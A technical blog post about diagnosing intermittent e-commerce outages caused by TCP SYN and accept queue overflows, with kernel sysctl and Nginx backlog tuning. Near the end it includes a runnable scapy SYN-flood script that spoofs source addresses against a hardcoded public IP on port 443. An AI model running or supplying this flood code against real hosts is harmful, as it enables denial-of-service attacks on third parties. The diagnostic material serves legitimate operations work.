Operations 9 min read

Diagnosing and Fixing TCP SYN Queue Overflows that Crash E‑commerce Sites

This article walks through a real‑world incident where an e‑commerce site suffered intermittent outages due to TCP SYN and accept queue overflows, explains the underlying handshake mechanics, shows how kernel and Nginx parameters can be tuned, and provides Python scripts for testing and SYN‑flood simulation.

Efficient Ops
Efficient Ops
Efficient Ops
Diagnosing and Fixing TCP SYN Queue Overflows that Crash E‑commerce Sites

Problem description: the monitoring system reported intermittent inaccessibility of the e‑commerce homepage and other pages; security and traffic metrics looked normal, and a server reboot only temporarily resolved the issue.

Preliminary judgment: check device and network interface errors (using

cat /proc/net/dev

and

ifconfig

), and observe socket overflow and dropped sockets (e.g.,

netstat -s | grep -i listen

).

Observation: SYN socket overflow and dropped sockets increased sharply.

Check kernel sysctl parameters:

net.ipv4.tcp_syncookies

,

net.ipv4.tcp_max_syn_backlog

,

net.core.somaxconn

.

Inspect SELinux and NetworkManager status; disable if necessary.

Verify timestamp and reuse settings, and whether kernel recycle is enabled.

Deep analysis: the TCP three‑way handshake fills the half‑connection (SYN) queue first; when the full‑connection (accept) queue is full, the kernel follows the

tcp_abort_on_overflow

setting. With the default value 0, the server discards the client’s ACK, keeping the connection incomplete.

# cat /proc/sys/net/ipv4/tcp_abort_on_overflow 0

Changing

tcp_abort_on_overflow

to 1 makes the server send a reset packet when the accept queue is full, which surfaces as “connection reset by peer” in the web logs, confirming the root cause.

Kernel and Nginx tuning performed:

Linux kernel parameters: net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_max_syn_backlog = 16384 net.core.somaxconn = 16384

Nginx configuration: backlog=32768;

Python multithreaded stress test (no new issues found):

<code>import requests
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor
url='https://www.wuage.com/'
response=requests.get(url)
soup=BeautifulSoup(response.text,'html.parser')
with ThreadPoolExecutor(20) as ex:
    for each_a_tag in soup.find_all('a'):
        try:
            ex.submit(requests.get, each_a_tag['href'])
        except Exception as err:
            print('return error msg:'+str(err))
</code>

Understanding TCP handshake queues

The diagram shows two queues: the SYN (half‑connection) queue and the accept (full‑connection) queue. During the first handshake step, the server places the SYN in the half‑connection queue and replies with SYN+ACK. In the third step, if the accept queue is not full, the server moves the entry to the accept queue; otherwise it follows the

tcp_abort_on_overflow

policy.

If the accept queue is full and

tcp_abort_on_overflow

is 0, the server may resend SYN+ACK, and a client with a short timeout will likely fail.

SYN Flood (DoS) attack example

<code>from concurrent.futures import ThreadPoolExecutor
from scapy.all import *

def synFlood(tgt, dPort):
    srcList = ['11.1.1.2','22.1.1.102','33.1.1.2','125.130.5.199']
    for sPort in range(1024, 65535):
        index = random.randrange(4)
        ipLayer = IP(src=srcList[index], dst=tgt)
        tcpLayer = TCP(sport=sPort, dport=dPort, flags='S')
        packet = ipLayer/tcpLayer
        send(packet)

tgt = '139.196.251.198'
print(tgt)
dPort = 443

with ThreadPoolExecutor(10000000) as ex:
    try:
        ex.submit(synFlood, tgt, dPort)
    except Exception as err:
        print('return error msg:' + str(err))
</code>

The article emphasizes that TCP half‑connection and full‑connection queue issues are easy to overlook but critical, especially for short‑lived connections, and suggests building robust incident‑response mechanisms.

network troubleshootingTCPLinuxsysctlbackend operationsSYN flood
Efficient Ops
Written by

Efficient Ops

This public account is maintained by Xiaotianguo and friends, regularly publishing widely-read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together happily.

0 followers
Reader feedback

How this landed with the community

login Sign in to like

Rate this article

Was this worth your time?

Sign in to rate
Discussion

0 Comments

Thoughtful readers leave field notes, pushback, and hard-won operational detail here.